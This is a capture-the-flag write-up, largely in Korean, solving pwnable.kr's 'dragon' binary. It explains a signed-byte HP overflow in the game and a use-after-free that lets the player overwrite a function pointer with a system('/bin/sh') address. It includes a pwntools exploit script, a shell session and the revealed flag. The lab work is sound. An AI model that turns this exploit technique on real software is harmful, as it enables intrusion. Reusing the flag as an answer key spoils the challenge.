Description
I made a RPG game for my little brother.
But to trick him, I made it impossible to win.
I hope he doesn’t get too angry with me :P!
Author : rookiss
Download : http://pwnable.kr/bin/dragon
Running at : nc pwnable.kr 9004
checksec
seo@seo:~/Documents/pwnable.kr/dragon$ checksec ./dragon
[*] '/home/seo/Documents/pwnable.kr/dragon/dragon'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Solution
Baby dragon
Baby Dragon Has Appeared! [ Baby Dragon ] 50 HP / 30 Damage / +5 Life Regeneration.
적인 아기 드래곤은 체력 50을 가지고 있고, 1턴마다 플레이어에게 30데미지를 주고, 5씩 체력을 회복한다.
Mama dragon
[ Mama Dragon ] 80 HP / 10 Damage / +4 Life Regeneration.
적인 어미 드래곤은 체력 80을 가지고 있고, 1턴마다 플레이어에게 10데미지를 주고, 4씩 체력을 회복한다.
Priest
[ Priest ] 42 HP / 50 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
플레이어인 성직자는 체력 42, 마나 포인트 50을 가지고 있다.
스킬은 다음과 같다.
[1] Holy Bolt [10MP 소모]
적에게 데미지 20 주기
[2] Clarity [0MP 소모]
마나 포인트 원래대로 회복
[3] HolyShield [25MP 소모]
메이플에서 다크사이트 같은 스킬이다. 적으로부터 데미지를 회피시킬 수 있다.
Knight
[ Knight ] 50 HP / 0 Mana
[ 1 ] Crash
Deals 20 Damage.
[ 2 ] Frenzy
Deals 40 Damage, But You Lose 20 HP.
플레이어인 기사는 체력 50, 마나 포인트 0을 가지고 있다.
스킬은 다음과 같다.
[1] Crash
적에게 데미지 20 주기
[2] Frenzy
적에게 데미지 40을 주지만, 플레이어 또한 HP20을 잃는다.
체력과 체력 회복량이 BYTE 타입으로 되어있기 때문에
-128 ~ 127 범위를 가지고 있다.
따라서 플레이어를 성직자인 Priest로 하고, 적이 어미 드래곤인 Mama dragon일때,
HolyShield 스킬을 연달아 사용하고 Clarity 스킬을 사용하는 행위를 4번 반복하는등
존버하다보면
어미 드래곤인 Mama dragon이 128체력을 넘기면서 오버플로우가 발생하여
음수가 되기 때문에, 이길 수 있다.
Choose Your Hero
[ 1 ] Priest
[ 2 ] Knight
1
Mama Dragon Has Appeared!
[ Mama Dragon ] 80 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 42 HP / 50 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 84 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 42 HP / 25 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 88 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 42 HP / 0 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
2
Clarity! Your Mana Has Been Refreshed
But The Dragon Deals 10 Damage To You!
And The Dragon Heals 4 HP!
[ Mama Dragon ] 92 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 32 HP / 50 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 96 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 32 HP / 25 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 100 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 32 HP / 0 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
2
Clarity! Your Mana Has Been Refreshed
But The Dragon Deals 10 Damage To You!
And The Dragon Heals 4 HP!
[ Mama Dragon ] 104 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 22 HP / 50 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 108 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 22 HP / 25 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 112 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 22 HP / 0 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
2
Clarity! Your Mana Has Been Refreshed
But The Dragon Deals 10 Damage To You!
And The Dragon Heals 4 HP!
[ Mama Dragon ] 116 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 12 HP / 50 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 120 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 12 HP / 25 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
3
HolyShield! You Are Temporarily Invincible...
But The Dragon Heals 4 HP!
[ Mama Dragon ] 124 HP / 10 Damage / +4 Life Regeneration.
[ Priest ] 12 HP / 0 MP
[ 1 ] Holy Bolt [ Cost : 10 MP ]
Deals 20 Damage.
[ 2 ] Clarity [ Cost : 0 MP ]
Refreshes All Mana.
[ 3 ] HolyShield [ Cost: 25 MP ]
You Become Temporarily Invincible.
2
Clarity! Your Mana Has Been Refreshed
But The Dragon Deals 10 Damage To You!
And The Dragon Heals 4 HP!
Well Done Hero! You Killed The Dragon!
The World Will Remember You As:
같은 메모리 크기인 0x10을 할당하기 때문에,
scanf에서 여기다가
system(“/bin/sh”)를 호출하는 지점인 0x8048DBF 값을 입력하면 쉘을 획득할 수 있다.
solve.py
from pwn import *
#context.log_level = 'debug'
context(arch='amd64', os='linux')
warnings.filterwarnings('ignore')
#p = process("./dragon")
p = remote("pwnable.kr", 9004)
e = ELF('./dragon')
p.sendlineafter("[ 2 ] Knight\n", "2")
p.sendlineafter("Deals 40 Damage, But You Lose 20 HP.\n", "2")
p.sendlineafter("[ 2 ] Knight\n", "1")
for i in range(4):
p.sendlineafter("You Become Temporarily Invincible.\n", "3")
p.sendlineafter("You Become Temporarily Invincible.\n", "3")
p.sendlineafter("You Become Temporarily Invincible.\n", "2")
# pause()
p.sendlineafter("The World Will Remember You As:\n", p32(0x8048DBF)) #system("/bin/sh");
p.interactive()
Result
seo@seo:~/Documents/pwnable.kr/dragon$ python3 solve.py [+] Opening connection to pwnable.kr on port 9004: Done [*] Switching to interactive mode And The Dragon You Have Defeated Was Called: $ ls dragon flag log super.pl $ cat flag MaMa, Gandhi was right! :) $ [*] Interrupted [*] Closed connection to pwnable.kr port 9004
